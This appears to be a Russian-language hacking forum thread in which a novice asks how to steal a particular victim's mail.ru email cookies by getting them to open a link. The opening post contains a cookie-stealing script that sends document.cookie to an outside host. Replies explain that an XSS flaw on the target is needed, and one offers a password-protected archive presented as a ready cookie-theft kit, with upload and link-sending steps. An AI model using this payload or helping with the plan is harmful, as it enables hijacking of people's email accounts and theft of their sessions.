если я на бесплатном хосте сделаю хтмл страницу с скриптом, который тырит куки HTML: <script>img = new Image(); img.src = "http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;</script> и жертва откроет по ссылке ету страницу, то у меня будут куки или нет? ЗЫ: пишем те, кто уже точно знает!
смотри, я послал жертве на мейл.ру она открыла ссылку етой странице, у меня буду ее куки от почтового ящика?!
так как же можно получить куки, если жертва киликает по ссылки, как? какой скрипт, уже много статей почитал инфы 0!искать xss ето не к етой теме!
та бред ети xss, если меня интересует определенное мыло, и xss на нем нету, как кто то же можно угнать куки!!!!!!! ЗЫ брут бредддддддд!
Бред говоришь ты. У тебя есть колеса - этот скрипт. Но нет двигателя XSS Как ты без двигателя толкнешь колеса? Да никак. Xss и используется, чтобы сookie своровать.
ну вот например в3ять мейл ру, именно почту, а не другие ресурсы, наврядли там есть xss Зы: 1. пасивная xss что нам дает, с ней моно гнать куки 2. и вообще пасивніе же xss должні прибивать, коль о них много народу знает!
ну вот например в3ять мейл ру, именно почту, а не другие ресурсы, наврядли там есть xss Зы: 1. пасивная xss что нам дает, с ней моно гнать куки 2. и вообще пасивніе же xss должны прибивать, коль о них много народу знает!
Не исключено, что нет. Может, не говорят о ней, или еще не нашли? Если пытаешься атаковать там, где нет Xss все действия просто бессмыслены)
а как можно легко добыть куки почт ящика, не посылайте читать темы, просто опишите как делаете это вы!
http://mirhtml.narod.ru/kuki_2.rar Pass:123 Редактируешь файл , заливаешь на хост и даёшь линк жертве... И те на хост приходит файл с куками ... Тестировалось на Windows sp2
Ice_Burn, скажи еще как именно залить? Narod.ru подойдет? Какую ссылку нужно давать? И куда прийдут куки?
ТС задолбал создавать тупые темы !!! где модераторы??? http://forum.antichat.ru/thread118782.html http://forum.antichat.ru/thread118777.html нельзя же быть настолько тупым.. читай форум и не задавай тупых вопросов.
слушай, я задаю эти вопросы и людя интересно, которые тоже заинтересованы в помоще, а ты такой же новичек как и я, и кричиш тут на весь форум "Где модераторы..." воображая из себя какого то перца! ЗЫ: кто то тестил способ от Ice_Burn
Не хочу оффтопить, но воображаешь из себя только ты и причем не "какого то перца", а какого-то неадыкватного человека.. зачем создавать 3 одинаковых темы и обсуждать в них вопрос который понятен ЛЮБОМУ кто хоть чуть-чуть шарит в IT... а ты если не шаришь, то попытайся хотя бы полистать форум, начни с этой темы: http://forum.antichat.ru/thread20140.html з.ы. мой статус новичка ни о чем не говорит...
я читал, ну ты пойми, ну это же почти нериал искать ети xss, вот возьмем mail.ru, при регистрации пару полей и я проверял нет там xss? где еще можно искать? на "Мой мир" такая же история, естих полей мало для заолнения и коментов ГДЕ там чтот о можно найти, БРЕД!
